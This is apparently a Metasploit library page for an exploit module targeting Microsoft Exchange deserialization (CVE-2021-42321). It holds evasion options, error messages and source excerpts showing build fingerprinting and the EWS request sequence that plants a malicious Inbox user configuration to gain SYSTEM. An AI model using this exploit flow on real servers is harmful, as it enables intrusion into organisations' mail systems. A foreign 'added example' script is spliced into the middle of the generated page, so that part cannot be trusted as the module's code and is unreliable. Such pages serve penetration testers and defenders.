HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding          false            no        Enable folding of HTTP headers
HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
HTTP::method_random_case      false            no        Use random casing for the HTTP method
HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
TCP::max_send_size            0                no        Maximum tcp segment size. (0 = disable)
TCP::send_delay               0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
- Target did not respond to check.
- Exchange Server <BUILD> is a vulnerable build.
- Exchange Server <BUILD> is not a vulnerable build.
- Target did not respond to check.
- Exchange Server <BUILD> is a vulnerable build.
- Exchange Server <BUILD> is not a vulnerable build.
- Target did not respond to check.
- Exchange Server <BUILD> is a vulnerable build.
- Exchange Server <BUILD> is not a vulnerable build.
- Range provided is not iterable
- Target did not respond to check.
- Exchange Server <BUILD> is a vulnerable build.
- Could not determine the build number of the target Exchange Server.
- Connection failed
- Response obtained but it was empty!
- Response obtained but no FolderId element was found within it!
- Response obtained without expected Id and ChangeKey elements!
- Connection failed
- Response obtained but it was empty!
- Success
- Was not able to successfully delete the existing user configuration on the Inbox folder!
- Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!
- Connection failed
- Response obtained but it was empty!
- Success
- Was not able to successfully create the malicious user configuration on the Inbox folder!
- Connection failed
- Response obtained but it was empty!
- Did not recieve the expected internal server error upon deserialization!
Check for possible causes in the code snippets below, taken from the module source code. This can often help identify the root cause of the problem.
Target did not respond to check.
Here is a relevant code snippet related to the "Target did not respond to check." error message:
141: 'method' => 'GET',
142: 'uri' => normalize_uri(target_uri.path, '/owa/service')
143: )
144:
145: unless res
146: return CheckCode::Unknown('Target did not respond to check.')
147: end
148:
149: if res.headers['X-OWA-Version']
150: build = res.headers['X-OWA-Version']
151: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
Exchange Server <BUILD> is a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is a vulnerable build." error message:
147: end
148:
149: if res.headers['X-OWA-Version']
150: build = res.headers['X-OWA-Version']
151: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
152: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
153: else
154: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
155: end
156: end
157:
Exchange Server <BUILD> is not a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is not a vulnerable build." error message:
149: if res.headers['X-OWA-Version']
150: build = res.headers['X-OWA-Version']
151: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
152: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
153: else
154: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
155: end
156: end
157:
158: # Next, determine if we are up against an older version of Exchange Server where
159: # the /owa/auth/logon.aspx page gives the full version. Recent versions of Exchange
Target did not respond to check.
Here is a relevant code snippet related to the "Target did not respond to check." error message:
162: 'method' => 'GET',
163: 'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx')
164: )
165:
166: unless res
167: return CheckCode::Unknown('Target did not respond to check.')
168: end
169:
170: if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body))
171: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
172: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
Exchange Server <BUILD> is a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is a vulnerable build." error message:
167: return CheckCode::Unknown('Target did not respond to check.')
168: end
169:
170: if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body))
171: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
172: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
173: else
174: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
175: end
176: end
177:
Exchange Server <BUILD> is not a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is not a vulnerable build." error message:
169:
170: if res.code == 200 && ((%r{/owa/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\d+\.\d+\.\d+\.\d+)} =~ res.body))
171: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
172: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
173: else
174: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
175: end
176: end
177:
178: # Next try @tseller's way and try /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
179: # URL which if successful should provide some XML with entries like the following:
Target did not respond to check.
Here is a relevant code snippet related to the "Target did not respond to check." error message:
188: 'method' => 'GET',
189: 'uri' => normalize_uri(target_uri.path, '/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application')
190: )
191:
192: unless res
193: return CheckCode::Unknown('Target did not respond to check.')
194: end
195:
196: if res.code == 200 && res.body =~ /name="microsoft.exchange.ediscovery.exporttool" version="\d+\.\d+\.\d+\.\d+"/
197: build = res.body.match(/name="microsoft.exchange.ediscovery.exporttool" version="(\d+\.\d+\.\d+\.\d+)"/)[1]
198: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
Exchange Server <BUILD> is a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is a vulnerable build." error message:
194: end
195:
196: if res.code == 200 && res.body =~ /name="microsoft.exchange.ediscovery.exporttool" version="\d+\.\d+\.\d+\.\d+"/
197: build = res.body.match(/name="microsoft.exchange.ediscovery.exporttool" version="(\d+\.\d+\.\d+\.\d+)"/)[1]
198: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
199: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
200: else
201: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
202: end
203: end
204:
Exchange Server <BUILD> is not a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is not a vulnerable build." error message:
196: if res.code == 200 && res.body =~ /name="microsoft.exchange.ediscovery.exporttool" version="\d+\.\d+\.\d+\.\d+"/
197: build = res.body.match(/name="microsoft.exchange.ediscovery.exporttool" version="(\d+\.\d+\.\d+\.\d+)"/)[1]
198: if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
199: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
200: else
201: return CheckCode::Safe("Exchange Server #{build} is not a vulnerable build.")
202: end
203: end
204:
205: # Finally, try a variation on the above and use a well known trick of grabbing /owa/auth/logon.aspx
206: # to get a partial version number, then use the URL at /ecp/<version here>/exporttool/. If we get a 200
Range provided is not iterable
Here is a relevant code snippet related to the "Range provided is not iterable" error message:
210: # canonical_segments to make this close to the Rex::Version code format. Also for noticing that
211: # version_range is a Rex::Version object already and cleaning up some of my original code to simplify
212: # things on this premise.
213:
214: vuln_builds.each do |version_range|
215: return CheckCode::Unknown('Range provided is not iterable') unless version_range[0].canonical_segments[0..-2] == version_range[1].canonical_segments[0..-2]
216:
217: prepend_range = version_range[0].canonical_segments[0..-2]
218: lowest_patch = version_range[0].canonical_segments.last
219: while Rex::Version.new((prepend_range.dup << lowest_patch).join('.')) <= version_range[1]
220: res = send_request_cgi(
Target did not respond to check.
Here is a relevant code snippet related to the "Target did not respond to check." error message:
220: res = send_request_cgi(
221: 'method' => 'GET',
222: 'uri' => normalize_uri(target_uri.path, "/ecp/#{build}/exporttool/")
223: )
224: unless res
225: return CheckCode::Unknown('Target did not respond to check.')
226: end
227: if res && res.code == 200
228: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
229: end
230:
Exchange Server <BUILD> is a vulnerable build.
Here is a relevant code snippet related to the "Exchange Server <BUILD> is a vulnerable build." error message:
223: )
224: unless res
225: return CheckCode::Unknown('Target did not respond to check.')
226: end
227: if res && res.code == 200
228: return CheckCode::Appears("Exchange Server #{build} is a vulnerable build.")
229: end
230:
231: lowest_patch += 1
232: end
233:
Could not determine the build number of the target Exchange Server.
Here is a relevant code snippet related to the "Could not determine the build number of the target Exchange Server." error message:
229: end
230:
231: lowest_patch += 1
232: end
233:
234: CheckCode::Unknown('Could not determine the build number of the target Exchange Server.')
235: end
236: end
237:
238: def exploit
239: case target['Type']
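The three build-fingerprinting steps shown across the check snippets above (OWA resource path, eDiscovery export tool manifest, then walking patch levels under /ecp/<build>/exporttool/) condensed into one stand-alone Ruby script that an administrator can run against saved responses from their own servers to see whether a build lands in a vulnerable range. This is an added example, not the module's code: the VULN_BUILDS ranges, the sample responses and the function names are constructed placeholders, and Gem::Version stands in for Metasploit's Rex::Version.

```ruby
require 'rubygems' # Gem::Version; Metasploit's Rex::Version is built on it

# Constructed placeholder ranges (NOT the real Exchange build numbers the
# module ships): [lowest vulnerable build, highest vulnerable build] per CU.
VULN_BUILDS = [
  [Gem::Version.new('15.9.100.0'), Gem::Version.new('15.9.100.9')],
  [Gem::Version.new('15.9.200.0'), Gem::Version.new('15.9.200.4')]
].freeze

# Same two places the module reads a full build from: OWA resource paths
# (/owa/<build>/ or /owa/auth/<build>/) and the eDiscovery export tool manifest.
OWA_BUILD_RE = %r{/owa/(?:auth/)?(?<build>\d+\.\d+\.\d+\.\d+)}
EXPORTTOOL_BUILD_RE = /name="microsoft\.exchange\.ediscovery\.exporttool" version="(?<build>\d+\.\d+\.\d+\.\d+)"/

# Constructed sample responses standing in for saved HTTP bodies.
OWA_SAMPLE = '<link rel="stylesheet" href="/owa/auth/15.9.100.3/themes/resources/logon.css">'
MANIFEST_SAMPLE = '<assemblyIdentity name="microsoft.exchange.ediscovery.exporttool" version="15.9.200.4" />'

# Returns the four-part build string found in the body, or nil if neither pattern matches.
def extract_build(body)
  m = OWA_BUILD_RE.match(body) || EXPORTTOOL_BUILD_RE.match(body)
  m && m[:build]
end

# The test behind "is a vulnerable build" / "is not a vulnerable build":
# does the build fall inside any range (both ends inclusive)?
def vulnerable_build?(build, ranges = VULN_BUILDS)
  version = Gem::Version.new(build)
  ranges.any? { |lo, hi| version.between?(lo, hi) }
end

# Expands a range into every build the module would probe when it only has a
# partial version and must try /ecp/<build>/exporttool/ one patch level at a time.
# Reproduces the "Range provided is not iterable" guard: lo and hi must agree on
# everything but the last segment, or stepping the patch counter never reaches hi.
# Uses #segments rather than #canonical_segments because the latter drops trailing
# zeros ('15.9.100.0' -> [15, 9, 100]), which would make a range starting at .0 look non-iterable.
def candidate_builds(lo, hi)
  prefix = lo.segments[0..-2]
  raise ArgumentError, 'Range provided is not iterable' unless prefix == hi.segments[0..-2]

  builds = []
  patch = lo.segments.last
  while (candidate = Gem::Version.new((prefix + [patch]).join('.'))) <= hi
    builds << candidate.to_s
    patch += 1
  end
  builds
end

# Probe paths for a range, in the form the module requests them.
def probe_paths(lo, hi)
  candidate_builds(lo, hi).map { |b| "/ecp/#{b}/exporttool/" }
end

if $PROGRAM_NAME == __FILE__
  [OWA_SAMPLE, MANIFEST_SAMPLE].each do |body|
    build = extract_build(body)
    puts "#{build}: #{vulnerable_build?(build) ? 'vulnerable' : 'not vulnerable'} build"
  end
  puts probe_paths(*VULN_BUILDS[1])
end
```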
Connection failed
Here is a relevant code snippet related to the "Connection failed" error message:
276: 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
277: 'data' => xml_getfolder_inbox,
278: 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
279: }
280: )
281: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
282:
283: unless res&.body
284: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
285: end
286:
Response obtained but it was empty!
Here is a relevant code snippet related to the "Response obtained but it was empty!" error message:
279: }
280: )
281: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
282:
283: unless res&.body
284: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
285: end
286:
287: xml_getfolder = res.get_xml_document
288: xml_getfolder.remove_namespaces!
289: xml_tag = xml_getfolder.xpath('//FolderId')
Response obtained but no FolderId element was found within it!
Here is a relevant code snippet related to the "Response obtained but no FolderId element was found within it!" error message:
286:
287: xml_getfolder = res.get_xml_document
288: xml_getfolder.remove_namespaces!
289: xml_tag = xml_getfolder.xpath('//FolderId')
290: if xml_tag.empty?
291: fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')
292: end
293: unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')
294: fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')
295: end
296: change_key_val = xml_tag.attribute('ChangeKey').value
Response obtained without expected Id and ChangeKey elements!
Here is a relevant code snippet related to the "Response obtained without expected Id and ChangeKey elements!" error message:
289: xml_tag = xml_getfolder.xpath('//FolderId')
290: if xml_tag.empty?
291: fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')
292: end
293: unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')
294: fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')
295: end
296: change_key_val = xml_tag.attribute('ChangeKey').value
297: folder_id_val = xml_tag.attribute('Id').value
298: print_good("ChangeKey value for Inbox folder is #{change_key_val}")
299: print_good("ID value for Inbox folder is #{folder_id_val}")
Connection failed
Here is a relevant code snippet related to the "Connection failed" error message:
320: 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
321: 'data' => xml_delete_inbox_user_config,
322: 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
323: }
324: )
325: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
326:
327: unless res&.body
328: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
329: end
330:
Response obtained but it was empty!
Here is a relevant code snippet related to the "Response obtained but it was empty!" error message:
323: }
324: )
325: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
326:
327: unless res&.body
328: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
329: end
330:
331: if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}
332: print_good('Successfully deleted the user configuration object associated with the Inbox folder!')
333: else
Success
Here is a relevant code snippet related to the "Success" error message:
326:
327: unless res&.body
328: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
329: end
330:
331: if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}
332: print_good('Successfully deleted the user configuration object associated with the Inbox folder!')
333: else
334: print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')
335: print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')
336: end
Was not able to successfully delete the existing user configuration on the Inbox folder!
Here is a relevant code snippet related to the "Was not able to successfully delete the existing user configuration on the Inbox folder!" error message:
329: end
330:
331: if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}
332: print_good('Successfully deleted the user configuration object associated with the Inbox folder!')
333: else
334: print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')
335: print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')
336: end
337:
338: # Now to replace the deleted user configuration object with our own user configuration object.
339: print_status('Creating the malicious user configuration object on the Inbox folder!')
Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!
Here is a relevant code snippet related to the "Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!" error message:
330:
331: if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}
332: print_good('Successfully deleted the user configuration object associated with the Inbox folder!')
333: else
334: print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')
335: print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')
336: end
337:
338: # Now to replace the deleted user configuration object with our own user configuration object.
339: print_status('Creating the malicious user configuration object on the Inbox folder!')
340:
Connection failed
Here is a relevant code snippet related to the "Connection failed" error message:
384: 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
385: 'data' => xml_malicious_user_config,
386: 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
387: }
388: )
389: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
390:
391: unless res&.body
392: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
393: end
394:
Response obtained but it was empty!
Here is a relevant code snippet related to the "Response obtained but it was empty!" error message:
387: }
388: )
389: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
390:
391: unless res&.body
392: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
393: end
394:
395: unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}
396: fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')
397: end
Success
Here is a relevant code snippet related to the "Success" error message:
390:
391: unless res&.body
392: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
393: end
394:
395: unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}
396: fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')
397: end
398:
399: print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')
400:
Was not able to successfully create the malicious user configuration on the Inbox folder!
Here is a relevant code snippet related to the "Was not able to successfully create the malicious user configuration on the Inbox folder!" error message:
391: unless res&.body
392: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
393: end
394:
395: unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}
396: fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')
397: end
398:
399: print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')
400:
401: # Deserialize our object. If all goes well, you should now have SYSTEM :)
Connection failed
Here is a relevant code snippet related to the "Connection failed" error message:
423: 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),
424: 'data' => xml_get_client_access_token,
425: 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.
426: }
427: )
428: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
429:
430: unless res&.body
431: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
432: end
433:
Response obtained but it was empty!
Here is a relevant code snippet related to the "Response obtained but it was empty!" error message:
426: }
427: )
428: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
429:
430: unless res&.body
431: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
432: end
433:
434: unless res.body =~ %r{<e:Message xmlns:e="http://schemas.microsoft.com/exchange/services/2006/errors">An internal server error occurred. The operation failed.</e:Message>}
435: fail_with(Failure::UnexpectedReply, 'Did not recieve the expected internal server error upon deserialization!')
436: end
Did not recieve the expected internal server error upon deserialization!
Here is a relevant code snippet related to the "Did not recieve the expected internal server error upon deserialization!" error message:
428: fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
429:
430: unless res&.body
431: fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')
432: end
433:
434: unless res.body =~ %r{<e:Message xmlns:e="http://schemas.microsoft.com/exchange/services/2006/errors">An internal server error occurred. The operation failed.</e:Message>}
435: fail_with(Failure::UnexpectedReply, 'Did not recieve the expected internal server error upon deserialization!')
436: end
437: end
438: end
Related Pull Requests
- #16294 Merged Pull Request: Msf::Payload::Apk: Replace jarsigner with apksigner
- #16288 Merged Pull Request: Msf::Payload::Apk: raise if apktool output includes Java exceptions
- #16292 Merged Pull Request: Fix typo in document of cve_2021_4034
- #16283 Merged Pull Request: Msf::Payload::Apk: raise if APK is unsigned or generating new key fails
- #16258 Merged Pull Request: Improve TLV Type handling
- #16135 Merged Pull Request: Add setg sessiontlvlogging command to log TLV packets
- #16268 Merged Pull Request: Update check comhijack
- #16141 Merged Pull Request: Add service manager commands to msfconsole
- #16179 Merged Pull Request: Update Meterpreter file existence tests for CI environments
- #16162 Merged Pull Request: Add explicit Github action permissions
- #16145 Merged Pull Request: Fix to_handler case sensitivity issue
- #16269 Merged Pull Request: Msf::Payload::Apk: Check Java is installed and apktool.jar exists
- #16270 Merged Pull Request: Msf::Payload::Apk: raise if keytool cannot parse APK file or certificate
- #16219 Merged Pull Request: Convert core enumextcmd & loadlib commands to human readable strings
- #16153 Merged Pull Request: Read full response on smtp send/recv
- #16265 Merged Pull Request: Fix race condition in jobs cleanup that could allow it to clean up twice simultaneously
- #16245 Merged Pull Request: pfSense Authenticated File Write (CVE-2021-41282)
References
- CVE-2021-42321
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321
- https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7
- https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169
- https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
- https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852
See Also
Check also the following modules related to this module:
- exploit/windows/http/exchange_chainedserializationbinder_rce
- exploit/windows/http/exchange_ecp_dlp_policy
- exploit/windows/http/exchange_ecp_viewstate
- exploit/windows/http/exchange_proxylogon_rce
- exploit/windows/http/exchange_proxynotshell_rce
- exploit/windows/http/exchange_proxyshell_rce
- auxiliary/gather/exchange_proxylogon_collector
- auxiliary/scanner/http/exchange_proxylogon
- auxiliary/scanner/http/exchange_web_server_pushsubscription
- auxiliary/scanner/msmail/exchange_enum
- exploit/windows/smtp/ms03_046_exchange2000_xexch50
- exploit/windows/ssh/freeftpd_key_exchange
- exploit/windows/ssh/freesshd_key_exchange
- auxiliary/dos/windows/smtp/ms06_019_exchange
- auxiliary/dos/windows/ssh/sysax_sshd_kexchange
- post/windows/gather/exchange
- exploit/windows/http/advantech_iview_unauth_rce
- exploit/windows/http/cayin_xpost_sql_rce
- exploit/windows/http/dlink_central_wifimanager_rce
- exploit/windows/http/dnn_cookie_deserialization_rce
- exploit/windows/http/geutebrueck_gcore_x64_rce_bo
- exploit/windows/http/git_lfs_rce
- exploit/windows/http/gitstack_rce
- exploit/windows/http/manageengine_adshacluster_rce
- exploit/windows/http/manage_engine_opmanager_rce
- exploit/windows/http/mcafee_epolicy_source
- exploit/windows/http/netgear_nms_rce
- exploit/windows/http/nscp_authenticated_rce
- exploit/windows/http/plex_unpickle_dict_rce
- exploit/windows/http/prtg_authenticated_rce
- exploit/windows/http/sepm_auth_bypass_rce
- exploit/windows/http/zentao_pro_rce
- exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce
Related Nessus plugins:
- Security Updates for Exchange (November 2021)
- Security Updates for Exchange (November 2021) (Remote)
Authors
- pwnforsp
- zcgonvh
- Microsoft Threat Intelligence Center
- Microsoft Security Response Center
- peterjson
- testanull
- Grant Willcox
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.